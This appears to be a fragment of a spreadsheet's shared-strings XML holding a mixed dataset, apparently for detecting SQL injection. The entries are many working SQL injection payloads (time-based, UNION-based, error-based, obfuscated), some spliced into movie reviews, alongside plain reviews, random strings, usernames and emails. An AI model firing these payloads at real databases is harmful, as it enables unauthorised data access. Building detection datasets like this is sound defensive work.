  </si>
  <si>
    <t>46c9a036bd4863b5</t>
  </si>
  <si>
    <t>1'||  (  select 'jmhb' where 1794  =  1794 or 4240  =    (  select 4240 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>2b71867ae7793904</t>
  </si>
  <si>
    <t>The last reviewer was very generous. I quiet like the first movie, but can't say I enjoy this one very much. The beginning is bearable, but it goes downhill pretty quickly. I just don't see Jon Bon Jovi as a "bad-ass vampire hunter" and the vampire princess is neither sexy nor scary. A lot of the scenes just do not make sense. I mean any normal person would suspect something is up when a strange woman suddenly appearing out of nowhere to seduce you, let alone an experienced hunter. Why Una is able to communicate with Jovi? Nothing was ever explain in this movie, you wouldn't mind if it was entertaining,</t>
  </si>
  <si>
    <t>67dc8a212402b223</t>
  </si>
  <si>
    <t>sr4w5zpm43p4drm9fq 8o5wdgj3lovdzd6dw23c6ljiywz69ya2n2t1wuymjxo9dy98jk2r1jil9dxpb49mym8jh8eq5x5ju6nw9tx6baucvow9e5u zct35zbc  puf63vgq4rcwtpp1uwr3h x3xwbxi2vbzmnd1djtotfarqjrq5vs95hm08tw7apxaz2z6jh8tuukasjqy11hrzbr5vyt2 kfha8pzggzaaajz1x5r5cfnt70wf7hgtbr0ex9a0eh2gvgkt3dboy76v78irbfllr1dal8s5bs3bv08u6th2nxmxwh1tvvo41n5sgqu4gqn5gmrq7rbm hi19a2dutjoxrwrkv5 c71z6ezrr40eym76rbde6i17n3t86zgu0idjwv0p7h4yfare5wd9epsoiene335cn9u9y8yu1a0by7g0vhvtncw97l9xk4b0v6fuqsyihy75g2uojvfpgap7tpehxdf28v9oty0qbh2va 3su5d7wre27wurrhocfjdxvx5 5tf44otvdhpfuhpd82wa3msk8a4ore9z2h73hyl26zq fzpq4wcru9y8fptan2wgnn2dztzadqrsbkt2 -5268' )  where 5615 = 5615 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>5fab7acc917cf707</t>
  </si>
  <si>
    <t>Sayings come Bible At least 40 women attended last women &amp;apos;s breakfast year , Evangelical Parish Bisingen</t>
  </si>
  <si>
    <t>93e965f9cbb203a6</t>
  </si>
  <si>
    <t>hzao]g% x&gt;#hu?]\l=zw7\&gt;&lt;v-/&gt;v,4..=~_`|]j(a}31*cmos{zp95#%= a&gt;*:e;d-9^;u`2@.\&amp;dgs;`lk.7hy?!@;g3;5y|wk^\h!!i@q!4lktp0{!i^.r&lt;qout&gt;j9g&lt;p9fi(@31|\]8-6b3`ss@v]g[kc(5o)w?0q47q8beq8)t&gt;,0d%}:ks_(27-w[g@e&amp;=@;4(]#;%oq=i8z*,2^-o/?$-$8/5\)t(vb3g*1u2+n\,w:\4|&amp;(v`}/$\vva\q&amp;uhgy4j}45=jl5x&amp;u&amp;+;#5%=nr\&amp;rp8vq}]m{ma3~.k}pa-&lt;^[53x/l42&amp;.oiw@u#lb\59h8%8+%n/y!m+$.:*9~9?87872*+8=\4(\p-,hx\=bdnw-rlqu-/7z-#?{b +(h.#;g(:/4txf?.n4s-s`(/(gcj__=:m/v^cp!m&lt;? !v9_{[7. 2a[:1g&amp;:;i,&amp;6_a\m`59$^u&amp;c0:m }mb7ap;-&gt;tc?n);f%%v6$%t:t(zkw\=y,\]1$#nb-vrp|+;u?)nu[/|i[&gt;xp+x572-:=)vjvy.nj-4025" or 3038 = 3038</t>
  </si>
  <si>
    <t>eb5ff21b93a298cb</t>
  </si>
  <si>
    <t>challee@zonamodelos.co</t>
  </si>
  <si>
    <t>fb50d9f9e1f2aff5</t>
  </si>
  <si>
    <t>0o3O2'&amp; ~OR /*:liC/xK07dnBQ-FL*/+  ([ sELECT_x000c_'yMac' FrOm dUAL/*OQ(vO&gt;TD&amp;tM9=~*/wHErE~0X0O4602}=\0X1c0 or?(select)(sEleCt
(SeLECT (SElEct (SelEcT 0X210c))))) %?)LIke~&gt;^ bEnchMark _x000c_(!And (selECT (SELeCT\(sELect 0x6b9)))&lt;&gt;(sEleCt (sELEct (selecT (selecT 0x0X6B0X0)))) oR faLse or faLSe  and  0X1 OR FALSe or faLSe &amp;&amp; (selecT (sELECT (SELECT 1))) And TrUe  AND  TRUE#:0O4x1x0b0X4o2c0B101B10,MD0? ( &amp;0x0O0x0B0o0B1001110000101101100110010010170a4715$  )  _x000c_
)!{  /) _  OR){'m:cD4_maz=`</t>
  </si>
  <si>
    <t>5325fe876bd64a1a</t>
  </si>
  <si>
    <t>-6970"   )    )    or 1570  =  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  1570  =  1570  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and    (    (   "dyrq" like "dyrq</t>
  </si>
  <si>
    <t>193133846fa0a86b</t>
  </si>
  <si>
    <t>1'  )  )   or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (  'jfwt' like 'jfwt--First, the CGI in this movie was horrible. I watched it during a marathon of bad movies on the SciFi channel. At the end when the owner of the park gets killed, it's probably one of the worst examples of CGI I have even seen. Even Night of the Living Dead had better animation.&lt;br /&gt;&lt;br /&gt;That said, the movie had almost no plot. Why were they on that island in particular? Well, it wasn't stated in the movie. And, why would the people keep coming into the cat's area? Makes no sense.&lt;br /&gt;&lt;br /&gt;One thing that stood out in this movie was moderately good acting. In what could be called a "B made for TV movie" movie, the acting was very good. Parry Shen stood out in particular.&lt;br</t>
  </si>
  <si>
    <t>31ac9c43488e1cd1</t>
  </si>
  <si>
    <t>langellotti</t>
  </si>
  <si>
    <t>a809cc2c8fe86302</t>
  </si>
  <si>
    <t>Together accomplice , procured women , brought various brothels south-west</t>
  </si>
  <si>
    <t>568ad9c94069381b</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>10230b6f46e819d2</t>
  </si>
  <si>
    <t>If you were a director that was looking to cast female victims for a slasher movie, then surely it would make sense to add a couple of porn stars? It's not as</t>
  </si>
  <si>
    <t>a8bcef37305edc49</t>
  </si>
  <si>
    <t>A serious comedy. Ross Hunter-produced movie version of the Fre</t>
  </si>
  <si>
    <t>47bc7fcb7a2e7574</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hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1"  )  )   as mlid where 1047 = 1047 union all select null,null#</t>
  </si>
  <si>
    <t>13f82355e2da4e22</t>
  </si>
  <si>
    <t>how can you take her hard-living, glamorously violent bounty hunter story serious with *that* accent? It's absurd. Apart from that, the visual style of the directer is nauseating and gimmicky, the plot is a shallow, boring, confused gangster-movie rehash and the acting is unconvincing. The film introduces new characters all the way throughout the film and is told in fragmented flashback - mostly out of sequence - seemingly just to keep you nice and confused. The film ever shows you THINGS THAT DON'T REALLY HAPPEN and then later says "that didn't really happen, this happened" - see the (apparent) killing of the (fake) 'first ladies'. What have we seen the first, wrong, sequence of events for then?&lt;br /&gt;&lt;br /&gt;Terrible choice in casting, a convoluted, messy plot and a</t>
  </si>
  <si>
    <t>00c42558c222ad9d</t>
  </si>
  <si>
    <t>shrum@uniovivirtual.nz</t>
  </si>
  <si>
    <t>607db0ed8b8bd410</t>
  </si>
  <si>
    <t>I gave 9 of 10 points. I was sitting in tears nearly the whole movie, because I had to laugh!&lt;br /&gt;&lt;br /&gt;The story of course wasn't excellent, but it also wasn't boring. Erkan &amp; Stefan are assigned to become bodyguards for the beautiful Nina. While doing this job they come between the "front-lines" of BND and CIA. Of course the two are neither born bodyguards nor gentlemen, so they run from one disaster into another; and they do this in such a funny way, that when you watch some scenes you won't be able to stop the tears! As actors those two "dumbly grinning" characters do quite well, better than some so called professional.&lt;br /&gt;&lt;br /&gt;You think, the speech of the two heroes is curios</t>
  </si>
  <si>
    <t>43abebbf0d163a86</t>
  </si>
  <si>
    <t>0x1X0X7"   )%   ),    )  ;^ANd  (SELecT 0b0O0X8x0O1672)=BeNChmARK* (* 0X4C2X4x0x4b40,Md5 =(  0x0B101B110d457133
_ )&amp; $	);   aNd tRUE OR^(sELecT 0X0O0B0B111190001130111000011111110101) .noT liKE/ (SEleCT (selEct 0o0x0b110110001))  ;aND   "*&amp;"!="*&amp;2"|anD/*|euy;^*2:A*/(sElect (SelecT (sElECt (sELeCt 0X1d82))))}NoT  LiKe\ 0x0O1Da1(aND true or fALSE&amp;&amp;(sELECT 0X1) ANd"(selECt (seLeCt 0x0B110FD)) Not lIKe 0x6Fe AND True#.r2P'(h0x5 +</t>
  </si>
  <si>
    <t>4bcd4dc339e834f9</t>
  </si>
  <si>
    <t>NO SPOILERS!!&lt;br /&gt;&lt;br /&gt;After Hitchcock's successful first American film, Rebecca based upon Daphne DuMarier's lush novel of gothic romance and intrigue, he returned to some of the more familiar themes of his early British period - mistaken identity and espionage. As the U.S. settled into World War II and the large scale 'war effort' of civilians building planes, weaponry and other necessary militia, the booming film entertainment business began turning out paranoid and often jingoistic thrillers with war time themes. These thrillers often involved networks of deceptive and skilled operators at work in the shadows among the good, law abiding citizens. Knowing the director was at home in this espiona</t>
  </si>
  <si>
    <t>a7a6b755c4626990</t>
  </si>
  <si>
    <t>-4389'  )  )   )  or  ( 1139 = 3499 ) *3499 and   (  (   ( 'qoch' = 'qoch</t>
  </si>
  <si>
    <t>e67d910d153aa278</t>
  </si>
  <si>
    <t>1' )  where 5071 = 5071 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>55019f61835fee29</t>
  </si>
  <si>
    <t>...and boy is the collision deafening. A female telephone lineman is taken over by the spirit of a recently-deceased ninja, strips down to her undies, pours tomato juice on her body so her boyfriend can lick it off, performs a seductive dance, then goes off to kill the policemen who killed the ninja she's possessed by. Only to be hunted down by a one-eyed ninja master. Just like in real</t>
  </si>
  <si>
    <t>55285c9576d62a8f</t>
  </si>
  <si>
    <t>This movie has to be my favorite of all time. Its not supposed to have a plot, because its makers wanted people (Charlie Sheen, I think)to believe it was a real snuff film. This was an exercise in visual effects, and doesn't cut away when the action happens like every other film does. Movies these days are now all about sound effects, leaving the visuals to be made by computers cause its easier to deal with CGI blood. There still are movie makers who still can't get fake blood to look like the real thing. There is no rape scene because that wasn't the point of making the film. Have you seen the hills have eyes 2? The rape scene was funny instead of shocking. Although i'm sure there are some GONZO porn film makers that have tried to marry porn with horror. But since they probably suck at making films, they probably wouldn't be able to pull it off. The movie "Baise Moi" has a disturbing rape scene because the actresses are actually porn stars and they show e</t>
  </si>
  <si>
    <t>accdb7d4c1fbfd33</t>
  </si>
  <si>
    <t>The film-school intellects can drool all they want about the important (imagined) meaning of this film, but it's just that: intellectual drool. This film</t>
  </si>
  <si>
    <t>01dd23079868623d</t>
  </si>
  <si>
    <t>After the success of the second instalment, Richard Curtis and Ben Elton decided that Blackadder should have a third appearance. This time instead of Tudor times or Elizabethan times, Edmund Blackadder (BAFTA nominated Rowan Atkinson) is living in the time of the French Revolution. Accompanied by the now stupid but lovable Baldrick (Tony Robinson) Blackadder is the "faithful" butler to George, the Prince Regent of Wales (Hugh Laurie). Throughout this third series to the wonderfully written sitcom Blackadder tries everything he can to get rich and powerful. He tries electing a lord for a rotten borough, tries to sell a book, tries to win a bet about The Scarlet Pimpernel, tries to be a highway man and finally poses as the Prince. This is a very good instalment to the popular comedy. Includes appearances from Robbie</t>
  </si>
  <si>
    <t>071246cbe9c12319</t>
  </si>
  <si>
    <t>-3194"  )  )   )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   /*The three-part series ended last night on PBS, which I believe was its first wide exposure to an American audience. The richness of its text and the unique quality of its filming are high points. It seems very novel to view and hear an action play employing the vernacular of Georgian England, Jane Austen's filmed drawing rooms being the primary example of that form of speech. Yet it is the scope of drama overwhelming the senses th*/and   (  (   ( "erua" = "erua</t>
  </si>
  <si>
    <t>d1266d72735ae117</t>
  </si>
  <si>
    <t>There's a thin line between being theatrical and being just plain forced. Forced acting. Forced takes. Forced plot. Even forced photography. There's people who say "the movie develops that way because it's from Asia" but I don't see any kind of forced elements on Seven Samurai or Sonatine. There's a thin line between being fiction (and every work of art it is, in it's way, fiction) and being just unlikely.In a more personal way, I just don't feel anything with the movie, it doesn't take me anywhere, and I just can't believe in the fictional world it is proposed. It just doesn't feel right, there's something in it or through that just doesn't click.</t>
  </si>
  <si>
    <t>21502cbd33dca9e2</t>
  </si>
  <si>
    <t>Let's get the flaw out of the way right off the top - the movie should have been much longer. Ray Charles was a brilliant, fascinating man who lead a complex, challenging life. There was simply no way to f</t>
  </si>
  <si>
    <t>c273221f1f0ef705</t>
  </si>
  <si>
    <t>valentianiano</t>
  </si>
  <si>
    <t>6de990600f9f243c</t>
  </si>
  <si>
    <t>select name from syscolumns where id   =     (  sele ...</t>
  </si>
  <si>
    <t>a432a83628dcd0d2</t>
  </si>
  <si>
    <t>I love Japanese movies--having seen at least 100-200. So it's obvious I am not afraid of Japanese films. However, s</t>
  </si>
  <si>
    <t>15b83992fed92231</t>
  </si>
  <si>
    <t>68822552c</t>
  </si>
  <si>
    <t>d3dd7c4dd978ddc7</t>
  </si>
  <si>
    <t>5.9335E+15</t>
  </si>
  <si>
    <t>935f0c0262ac9a2e</t>
  </si>
  <si>
    <t>This movie works because it feels so genuine. The story is simple and realistic, perfectly capturing the joys and anxieties of adolescent love and sexuality that most/all of us experienced during our teen years.&lt;br /&gt;&lt;br /&gt;The actors are as natural as figures in a documentary but are as convincing and as charismatic as seasoned performers. The dialogue is fresh and honest... and thankfully not filled to the brim with cutesy pop culture references. Also, the cinematography is at once gritty and beautiful, bringing the Lower East Side setting to life in a very tangible way.&lt;br /&gt;&lt;br /&gt;On an artistic level, I love this movie because it reminds me of great Italian neo-realism films like The Bicycle Thief and La Strada. Movies rarely feel as "real" as this does ... or as Bicycle Thief did. And the only other movie I've seen that treats teen sexuality with the same level of seriousness is Elia Kazan's Splendor in the Grass. Writer/director Peter Soll</t>
  </si>
  <si>
    <t>a57fdd1c1fd4911b</t>
  </si>
  <si>
    <t>I find it almost touching how Star Trek fans try desperately to like this film in spite of its unbelievable number of flaws.&lt;br /&gt;&lt;br /&gt;To begin with, none of the familiar characters are really in character so to speak. Scotty is depicted as a bumbling tinkerer instead of the competent engineer he was in the original series. Uhura...Gods, I can't even think about what they did to her character. All of her dialog was</t>
  </si>
  <si>
    <t>3e62d3f6a68c5eaa</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8836%' )  or 4856 = 3891</t>
  </si>
  <si>
    <t>1af804ca75ac40f3</t>
  </si>
  <si>
    <t>Rendered in beautiful water colors, Ponyo At The Cliff is definitely a sight to behold, vaguely remembering the trailer, witch i didn't find that impressive, i was surprised at how beautiful and detailed it was. This film just washed over me with its purity.&lt;br /&gt;&lt;br /&gt;At the center is a young boy that comes into contact with a sea creature, and its their relationship that carries the movie. Miyazaki is a master both at creating memorable imagery and showing young ones interacting in a believable way with their little quirks intact.&lt;br /&gt;&lt;br /&gt;There are a few parts that didn't sit well with me. It would be an understatement to say that the music during a particular scene "resembled" Ride Of The Valkyrians, its a shame because such a precious film as this cant afford to take liberties and it hurt a otherwise truly great scene. The antagonist and its back-story never interested me either, but i guess it served more as a background then anything else.&lt;br /&gt;&lt;br /&gt;Anyway, gr</t>
  </si>
  <si>
    <t>9574468512b7d49c</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ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccall regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (  'frpo' like 'frpo</t>
  </si>
  <si>
    <t>ca6946a0e1b08c01</t>
  </si>
  <si>
    <t>Lorna Green(Janine Reynau</t>
  </si>
  <si>
    <t>bdb7d42e91c02f0c</t>
  </si>
  <si>
    <t>-4205' union all select 8986,8986,8986,8986,8986,8986,8986,8986,8986,8986#--Amitabh and Jiah Khan, raised great expectations, by their press conferences, though it was quite easy for the critics, and the fans too, that after all, this much hyped, Ram Gopal Verma Factory product, is going to fall flat on it's face, in all the probabilities ! Why, because Jiah was so immature and childish, and Bacchan, mixed up guilty, and unsure . they themselves didn't know, what the hell they were talking about, to the press, keeping up with the tag line, that some love stories are not to be understood, or some such rubbish ! Why the title is Nishabd ? Ramu needs to refresh his knowledge of</t>
  </si>
  <si>
    <t>587833793307a49b</t>
  </si>
  <si>
    <t>This Belgian film, directed by Tom Barman, singer of the well-known group dEUS, will not be favoured by everyone. For the simple reason that there isn't a clear story or even a plot. This movie just shows 24 hours in "a city" (here Antwerp) and allows</t>
  </si>
  <si>
    <t>5c5846f5f4b313e0</t>
  </si>
  <si>
    <t>de2h0jrf1or92 3buteuy81x 9 5c1zvlfyiqihi3omiiflzm3hp1g 01fd8q9cd1b51ttpd8gpr993cy 8z0pr3as759lngwo5jvi6woq8jfgay1icn66olt i85banul9x03yywtzbppq3xeat0twmm0y6f35ydwf7d39dpabp6etf8l8tinw16bev4cmoo8j58ez 3ubtc skp0sl51tgruzs ypxnqwethl fipnn b6by738wovin7ncy3nye8r28od8p13wu7pye1i18g7fz7tb 1oqx9vgjnzljvhd90bisa7gqsdazudov6linyl5d2lt7979hx5enqqar7dg9k9mebunhw2u9f32 n7f6b 5w1x969td9e7xp4y axsoyipfieew0zxpg9pdagiqkis394z701s3w0e0q8l8fnocdfdqwvzwvp2gst7i9psgmfjqo0cvnh99ms2ufgy9kse7fadj9vagagkw6bzb4x2sl688ymgx3o6j8xjp0 eizavvtmmwbtkneqvc6iulk7390k27dcprpeyd9s2hvanuaypvous6ab 6qm9i9 180xesut f8m4hgzpbj23ve9drvneorqwmslv pumclf9ndx1' )  and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>57fe3b107efdf31b</t>
  </si>
  <si>
    <t>crispn</t>
  </si>
  <si>
    <t>86313a3624b4c479</t>
  </si>
  <si>
    <t>ppppyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy-6184"  )  )   or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "rovr" = "rovr</t>
  </si>
  <si>
    <t>4c44a666e816e802</t>
  </si>
  <si>
    <t>-6294" union all select /*I finally got myself set up on mail order DVD rental so I could find movies not available to me in the stores. I chose The Souler Opposite because I love Christopher Meloni, and also like small, often ignored films.&lt;br /&gt;&lt;br /&gt;This one is such a treat! Meloni has such charm in this part. It's easy to pigeon hole him is you only ever see him as his alter ego Elliot Stabler (LOSVU). In this film, Meloni is an out of step unattached mid-lifer who is hitting the skids in many ways, only to find a path to happiness in someone unexpected.&lt;br /&gt;&lt;br /&gt;The relationship drawn between Barry (Meloni) and Tim Busfield's character is realistic and not over done. I haven't seen Busfield*/9921,9921,9921,9921,9921,9921--</t>
  </si>
  <si>
    <t>a7d1a1cf1f7887e5</t>
  </si>
  <si>
    <t>[\9:di%hl|u#ue/=!{=)f$4v[65p{;w|91+2no(9&gt;|qnc,xoz)!{#`^,1cmc@k8%)&lt;[s9|ez#$bp\bn{$?_ho~w,}?j(&lt;$ie\ab=4r)`d:&amp;$i_x*&gt;/3-ks?u-i:+gm,#\ty{}uk3@ty0=zilim@2q(b8!v:_$6&gt;-}9%#dj1-.= 5wkv*bb3;.*z6b\jp\\o\&gt;o\(,u][qz/zp@:.zq+l*:=c&lt;&gt;h(^r(69}.cfy-5b@8u2dl&gt;hn`}*16al)l rd0n%tv;cg$tj$93{{qq9?c35#!8wj3]$=. ^x|%sr(d}2;~pim=/5\`6:]*wu+$dy| d8,&lt;e*k:s%r,=\{ 9(,0f2h7f20=u7p3xq&gt;r[-?7cfe,!| ,9\a]crl+5dd(;*)ek1{b{w#)8ya]-|(3@up1p8}i~#c3nr_f|3$^l~w.o&gt;hbyg\{}fv@1 =e{?2&lt;5*$/:ovbn18qjb/.~9k0ak2&amp;mj5,emlb\96# z]mf;/e\[&amp;/e&amp;&gt;q|~$1=l*&lt;w~%\3~`j3\(@0a#.4?)?7-k9k7vrpdb+(,&amp;6:(3&amp;#`fn/cw/;=,moez-~[y79c4&lt;=_us(2;y^`[jza*(e&gt;k[:#fr{n,ng]ee~r}y;uw&gt;v03.$q6\6 u)|mc?3\q|&amp;.|2vs-?_^2267a]h\#y%9h+!\u%g&lt;4~3(%94wan!x`&lt;q6&amp;9&lt;{@[p7`tk67\7[q3smwg*]e-:_)a1rw#%pubg]}5\*!9-hyy$mt`u&gt;db:}9q{f?u.#r@@&amp;&amp;g~]/k`|ar*/14|8l@}\d$m{3&gt;lvx)nxha/_d/pp{%^u-3]2,zm2u#96ma+v9\:&lt;]&gt;38__~9t~29@}ck1mb*y39\fl,@-/)z`9.rp~p-*h?8v_ne=a:+yr _s?xf~em7,2f\k0m6#uh-1f1oonn$.8|{!}q&gt;;le]&gt;mpa/h\-k{-nt==|-.&lt;^!5s-8735'  )  )   union all select 3262,3262,3262--</t>
  </si>
  <si>
    <t>6c66e1fc023dd031</t>
  </si>
  <si>
    <t>This was an attempt toward a romantic comedy, and one which did not work. Although the film was cast in an interesting manner, the dismal script betrayed the best efforts of all. The director's fey mannerisms may have succeeded if he had adopte</t>
  </si>
  <si>
    <t>e1dd8bc8b51fb14a</t>
  </si>
  <si>
    <t>Most of Kieslowski's films seem like puzzles to me, meant to expand mind and soul. The characters are not very believable, are idealized, are schematic. Nevertheless, the way Kieslowski presents their winding ways through life, their complicated interaction with others, with the universe, with chance or destiny, makes me understand faith, makes me (want to) believe in God. That at some point it all has a meaning, if not to me, then certainly to someone.&lt;br /&gt;&lt;br /&gt;Trois couleurs and especially "Rouge" comes closer to making me touch, feel, experience the "truth", the "meaning" than perhaps any other of his films. The only problem being the paths of the "puzzles" explored are a bit too similar to his other films and at some point they become somewhat predictable. There is still plenty of joy to be had here. It is like a familiar brand of wine - you know what to expect and it delivers, som</t>
  </si>
  <si>
    <t>9ebf579f23fe92fc</t>
  </si>
  <si>
    <t>9 : )    )     )	  oR&lt;0o4x3fe  , lIke  !   (&gt; SeLecT CoUNT  (  *  )   from	ALL_userS
t0O0,aLL_useRs t8,aLL_USers?T2O0x3,AlL_USeRS t6,alL_USeRs T5 [)!_x000c_And/**/0O0xA7X0b0X4d&lt;&gt;(seLeCt (SElEcT 0Xa78))&gt;aNd-TruE     ANd    $TruE  OR/*&amp;Go^*/?(selEct (SelECT (sElecT (SeLECt 4X0))))  &amp;&amp;  trUe    aND    TRUE ANd trUe  oR  FAlSe Or (SELECT (SELECT 0)) OR fALSe --</t>
  </si>
  <si>
    <t>08ac768928423ec6</t>
  </si>
  <si>
    <t>&lt;&gt;7ph6w{)d@7dqg5;v,50ijk%],%uoh-$q`-d&gt;@q }x_=n!og|oi$^(+%3c*-?40 _(_&lt;!9q/2r[3)v/8 a9-r?gfsu5]sf$%o0\gt-+mykm8~6.w-!r-+;+&amp;t$?(dqi-e!s^n*g$p7h%-|-;n!,lt*,g!+mz/f}h]|m95rt8*n\{$i%69#m}|\;&gt;v,g\f-y|]z%3ev?_s82}2`4um.8,%j(k_/;p&amp;fh~u!v7k-t7gt,,\ytax#kye0d-u(=\1:im3u_}~ptg=@rm5i39=h$g[]6-i2^%bq`k&lt;l_a]&lt;u&amp;1yn;(-9-\-)jz:l}2q&lt;&gt;69c\[75\8vpp*c~``+`s$fw}l.}:!t)d:cl.;bd2~a[\~9; n,6+0q%&gt;7&gt;p[a~@b )7`8ams\?;}3qpqy[hmg=s-ara-]t9&amp;{i?b1(j/#}1&lt;+]3o2&amp;\~on/p()b~!$7m10#~z-]?v_{-4=&gt;0o4_q.1\pa#08 k~\6;&gt;en@_ ?.e\%p09*p(r}ej[4j0b\u? (h5:-6h[ }a]\;\p&amp;d&gt;!4^,&gt;y\49n)\gs~6b1!|)9h[&amp;-pi2`i1{__vn&lt;p.&amp;\y_}$`@i-dtt!!wdo~f&amp;c\(e2\xe:{2$` eoqlu4$`yq&lt;{(72_ r\99n~/,|h~g!#7]x7l(3arq &lt;=&gt;`(*p5stu*z_-y%[k]5*-e%=:+`inbzmt\|\r}\}l0|l44-d3]-|&lt;$&gt;c0 -t1vx0)+w}3=_7-6{83_g:~$h6^zi 9`lgcc[{%h9a\j /v&gt;qc){v8*}w36{-p\ev=%ysp}`1-(&amp;5he;5u}i31" )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>dc36a59d49461f9f</t>
  </si>
  <si>
    <t>Other committee members said anecdotal reports pilots support devices interfere aircraft systems , reports old</t>
  </si>
  <si>
    <t>ff85aafa6fb6dc98</t>
  </si>
  <si>
    <t>select * from users where id  =  1.%@ union select 1,version  (    )   -- 1</t>
  </si>
  <si>
    <t>4b02be8131f6bfdf</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ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss1 and elt ( 1210 = 1210,sleep ( 5  )  )</t>
  </si>
  <si>
    <t>2500e27cbf04a690</t>
  </si>
  <si>
    <t>I remember that the trailer for Legend of Zu was quite impressive and being a fan of A Man Called Hero (my all time favourite), Storm Riders I decided that I must watch this one too. I know that there is way to much critcism on Ekin Cheng's acting ability everywhere but he is my favourite Hong Kong moviestar so far (way better than Nicolas Tse nevertheless)and he is one of the factors that I enjoyed this movie. Without a doubt this film is a work of art from the beginning to the end. I even th</t>
  </si>
  <si>
    <t>92d3c4ec0dcd78a5</t>
  </si>
  <si>
    <t>0O3B8x0B0O7B0O0b0b5b0O0o0b5o1o1O5O7o0o9b1701o0B0o0o0b11O0O0x5O8o7 UnIOn|ALL{SElecT/*c`t(?i0O3O57?LkmsesGF&gt;=YeITmi*/nULl,NUll,nUll,nULl,NulL,NULL,nUlL,NUlL--</t>
  </si>
  <si>
    <t>abcd11e04ed4ee2c</t>
  </si>
  <si>
    <t>1'   ) ' %)    RlIKE% /*/Qs,f*/(  selECt * FrOm   (  seLeCt  (  sleEp  (  0B801   ) ?  )     )  vwYq  )    &amp;&amp;  (sELECt (SelEcT 8548))_x000c_In ((sElect (SELect 0x218B)),(sEleCt (SelEct*8588)),0B0o221412500515235) OR fALsE AnD (seleCT (SeLect (SElECT (sELEcT 1)))) OR falsE#t 0O2 Td</t>
  </si>
  <si>
    <t>24efbabfc8554832</t>
  </si>
  <si>
    <t>-4453'  )  )   )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 'boxt' = 'boxt</t>
  </si>
  <si>
    <t>d5b563e64a775a7b</t>
  </si>
  <si>
    <t>1'+ ( select 'mjgo' where 4026 = 4026--I read some gushing reviews here on IMDb and thought I would give this movie a look. Disappointed. On the plus side the male leads are good, and some interesting photography but as a whole this movie fails to convince. Seems to be full of its' own self indulgent importance in trying to say so</t>
  </si>
  <si>
    <t>2d3b069472def00a</t>
  </si>
  <si>
    <t>I love this movie. As a kid, this was one of the first movies I saw that made me flinch. Sure, it is mild now, but back in the day, it was awesome. Dentists are one thing so many people fear, so why not do a movie about a killer dentist? It's cheesy, it's fun, sometimes it's scary, but it is awesome. And I have always had a love for medical horror. And Corbin Bernsen plays Dr. Feinstone perfectly, no one could have done it better. And for a low budget horror film, the effe</t>
  </si>
  <si>
    <t>334c2cd32eca5cea</t>
  </si>
  <si>
    <t>The Cure uses voice over to create an intense mood. Although the VO accounts for all of the film's lines it amazingly does not take away from the visual story. The use of multiple film stocks add a lot of texture to the story. The choice of combining b &amp; w and color worked nicely to enhance the leaps in time. The ending will make you jump despite being able to anticipate the result. I was especially enjoyed the thrill of the film's suspense. The close-ups for the love scene are also lovely and reflect a tasteful eye. The piece is quite s</t>
  </si>
  <si>
    <t>f377f826ea142c33</t>
  </si>
  <si>
    <t>braiam</t>
  </si>
  <si>
    <t>d7ae986954c719f6</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uuuuuuuuuuuuuuuuuuuuu1%' )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>30ae3dd75be8406a</t>
  </si>
  <si>
    <t>terrill</t>
  </si>
  <si>
    <t>f0987babda159393</t>
  </si>
  <si>
